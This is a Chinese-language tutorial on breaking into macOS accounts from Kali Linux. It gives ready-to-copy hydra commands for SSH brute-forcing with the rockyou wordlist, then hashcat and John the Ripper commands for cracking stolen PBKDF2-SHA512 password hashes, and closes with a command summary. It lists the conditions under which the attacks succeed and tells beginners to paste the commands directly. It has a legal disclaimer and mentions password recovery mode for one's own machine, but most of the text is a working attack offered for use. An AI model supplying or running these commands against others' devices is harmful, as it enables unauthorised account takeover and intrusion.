⚠️ 法律声明:仅限操作自己的 macOS 设备或已获得书面授权的安全测试,未经许可远程入侵、破解他人设备属于严重违法行为,需承担全部法律责任。
本文仅讲解 Kali 可完成的 2 种核心方式(远程爆破、离线哈希破解),避开复杂操作,新手可直接复制命令,全程无图片、纯文本。
一、远程破解(SSH 爆破,最常用)
前提条件(必满足)
- 目标 macOS 已开启「远程登录」(SSH 服务);
- Kali 与目标 macOS 处于同一局域网(公网爆破成功率极低,且违法风险高);
- 目标 macOS 未开启账户锁定、fail2ban 等防暴力破解防护。
操作步骤(直接复制命令)
解压 Kali 自带密码字典(首次使用,仅需执行1次)
gunzip /usr/share/wordlists/rockyou.txt.gz
单个用户名 + 密码字典爆破(推荐,效率高)
hydra -l 目标用户名 -P /usr/share/wordlists/rockyou.txt 目标IP ssh
示例(用户名 admin,目标IP 192.168.1.100):
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh
批量用户 + 批量密码爆破(需提前准备用户字典 users.txt)
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 目标IP ssh
非默认 22 端口(若 macOS 修改了 SSH 端口,比如 2222)
hydra -l 目标用户名 -P /usr/share/wordlists/rockyou.txt 目标IP ssh -s 2222
成功标识
终端出现以下内容,即为破解成功:
[22][ssh] host: 目标IP login: 目标用户名 password: 破解出的密码
二、离线破解(拿到哈希后,Kali 本地跑字典)
前提条件
- 已拿到目标 macOS 的密码哈希(需本地接触目标机,或已获得目标机 shell);
- 目标 macOS 未开启 FileVault 磁盘加密(开启后无法读取密码哈希)。
操作步骤
确认哈希格式(关键) 新版 macOS 密码哈希为 PBKDF2-SHA512 格式,对应 Kali 破解工具的模式如下: hashcat 模式:-m 7100John the Ripper 模式:--format=macos-sha512
使用 hashcat 破解(推荐,速度更快,支持 GPU 加速)
hashcat -m 7100 存放哈希的文件.txt /usr/share/wordlists/rockyou.txt
示例(哈希文件为 mac_hash.txt):
hashcat -m 7100 mac_hash.txt /usr/share/wordlists/rockyou.txt
使用 John the Ripper 破解(备选)
john --format=macos-sha512 存放哈希的文件.txt --wordlist=/usr/share/wordlists/rockyou.txt
三、关键注意事项(必看)
- 远程爆破限制:macOS 默认连续输错密码会触发账户延迟/锁定,几次失败后 Kali IP 可能被拉黑;
- FileVault 限制:一旦开启磁盘加密,无法读取密码哈希,远程、离线破解均无效;
- 密码复杂度限制:10 位以上、包含大小写+数字+符号的复杂密码,字典爆破基本无法成功;
- 公网禁止:公网环境下爆破 macOS 属于非法入侵,且会被防火墙、安全软件拦截;
- 最简替代方案:若只是忘记自己的 macOS 密码,无需 Kali,直接用 macOS 恢复模式执行
resetpassword 即可重置。
四、常用命令汇总(直接复制使用)
- 解压字典:
gunzip /usr/share/wordlists/rockyou.txt.gz - SSH 爆破(单个用户):
hydra -l 用户名 -P /usr/share/wordlists/rockyou.txt 目标IP ssh - hashcat 哈希破解:
hashcat -m 7100 哈希文件.txt /usr/share/wordlists/rockyou.txt - John 哈希破解:
john --format=macos-sha512 哈希文件.txt --wordlist=/usr/share/wordlists/rockyou.txt